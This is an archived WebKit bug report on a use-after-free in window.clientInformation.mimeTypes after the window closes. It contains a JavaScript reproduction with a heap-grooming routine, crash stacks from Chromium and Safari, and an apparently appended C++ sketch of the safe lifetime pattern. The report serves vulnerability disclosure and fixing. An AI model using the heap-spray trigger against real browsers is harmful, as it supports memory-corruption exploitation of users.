[Webkit-unassigned] [Bug 43297] New: cross_fuzz "plugins" window reload memory corruption

bugzilla-daemon at webkit.org bugzilla-daemon at webkit.org
Sat Jul 31 04:13:26 PDT 2010


https://bugs.webkit.org/show_bug.cgi?id=43297

           Summary: cross_fuzz "plugins" window reload memory corruption
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: PC
        OS/Version: Windows Vista
            Status: NEW
          Severity: Major
          Priority: P1
         Component: HTML DOM
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: skylined at chromium.org
                CC: eric at webkit.org
            Blocks: 42959


Created an attachment (id=63148)
 --> (https://bugs.webkit.org/attachment.cgi?id=63148)
Repro

This bug is similar to bug 43295 and 31886 in that it is also a use-after-free bug triggered by getting a certain property of a window object and reloading/closing the window before using the property.

<script>
  var target_window, mimeType;
  function step1() {
    console.log('step1');
    // Open a second window and grab a MimeType object that belongs to it.
    target_window = window.open("");
    mimeType = target_window.clientInformation.mimeTypes[0];
    console.log('step2');
    // Close the window; the MimeType object is still reachable from script.
    target_window.close();
    setTimeout(step2, 100);
  }
  function step2() {
    heap_corrupt();
    // postMessage serializes the MimeType, reading MimeType.enabledPlugin
    // after the window that owned it has gone away.
    try {target_window.postMessage(mimeType); } catch(e) {}
    console.log('reload');
    location.reload();
  }
  function heap_corrupt() {
    console.log('heap corrupted');
    var a = [];
    for(var si = 0; si < 0x100; si++) {
      try { a.push(new WebGLByteArray(si)) } catch (e) {}
      a.push(new Array(si).join('A'));
    }
    for (var li = 0x200; li < 0x10000; li <<= 1) {
      try { a.push(new WebGLByteArray(li)); } catch (e) {}
      a.push(new Array(li).join('A'));
    }
    delete a;
    gc();  // requires the engine to be started with GC exposed to script
  }
  step1();
</script>

Stacks vary, as the use-after-free can lead to unpredictable behavior. A common stack in Chromium is:
stack:          WebCore::SubframeLoader::allowPlugins
                WebCore::DOMMimeType::enabledPlugin
                WebCore::DOMMimeTypeInternal::enabledPluginAttrGetter
                v8::internal::Object::GetPropertyWithCallback
                v8::internal::Object::GetProperty
                v8::internal::Object::GetPropertyWithReceiver
                v8::internal::Runtime::GetObjectProperty
                v8::internal::GetProperty
                ...
Safari gave me this:
stack:          WebCore::MimeType::enabledPlugin
                WebCore::jsMimeTypeEnabledPlugin
                JSC::PropertySlot::getValue
                WebCore::SerializingTreeWalker::getProperty
                WebCore::walk<...>
                WebCore::SerializedScriptValueData::serialize
                WebCore::JSDOMWindow::postMessage
                WebCore::jsDOMWindowPrototypeFunctionPostMessage
                ...

This affects Safari 5, WebKit Nightly, Chrome 5 and Chromium latest and probably everything using WebKit.
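The lifetime problem behind this report, as a schematic C++ sketch added here (this is not WebKit's code and the Frame, Window and MimeType classes are simplified stand-ins): a script-reachable object keeps a pointer back to its window's frame, so it must be disconnected when the window closes and every getter must tolerate a null frame, instead of dereferencing a pointer that may already be freed.

```cpp
#include <memory>
#include <vector>
// Schematic model (not WebKit code) of a frame-owned resource that a
// script-reachable object must not touch once the window is closed.
struct Frame { bool pluginsAllowed = true; };
// Dangling pattern: raw back-pointer, dereferenced without any liveness check.
struct MimeTypeDangling {
    Frame* frame;
    bool enabledPlugin() const { return frame->pluginsAllowed; } // UAF after close
};
// Hardened pattern: the owner clears the back-pointer when the window is
// closed, and every getter treats a null frame as "no enabled plugin".
class MimeTypeSafe {
public:
    explicit MimeTypeSafe(Frame* f) : m_frame(f) {}
    void disconnectFrame() { m_frame = nullptr; }
    bool enabledPlugin() const { return m_frame != nullptr && m_frame->pluginsAllowed; }
private:
    Frame* m_frame;
};

// Models window.open()/close(): the window owns the frame, but script may keep
// a MimeType it obtained from the window alive past close().
class Window {
public:
    Window() : m_frame(std::make_unique<Frame>()) {}
    std::shared_ptr<MimeTypeSafe> mimeType() {
        auto mt = std::make_shared<MimeTypeSafe>(m_frame.get());
        m_handedOut.push_back(mt);
        return mt;
    }
    void close() {
        for (auto& mt : m_handedOut) mt->disconnectFrame(); // detach before freeing
        m_handedOut.clear();
        m_frame.reset();
    }
private:
    std::unique_ptr<Frame> m_frame;
    std::vector<std::shared_ptr<MimeTypeSafe>> m_handedOut;
};
// Mirrors the report's sequence: open, fetch mimeTypes[0], close, use later.
bool enabledPluginBeforeClose() { Window w; return w.mimeType()->enabledPlugin(); }
bool enabledPluginAfterClose() {
    Window w;
    auto mt = w.mimeType();
    w.close();
    return mt->enabledPlugin(); // false, without touching the freed frame
}
```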
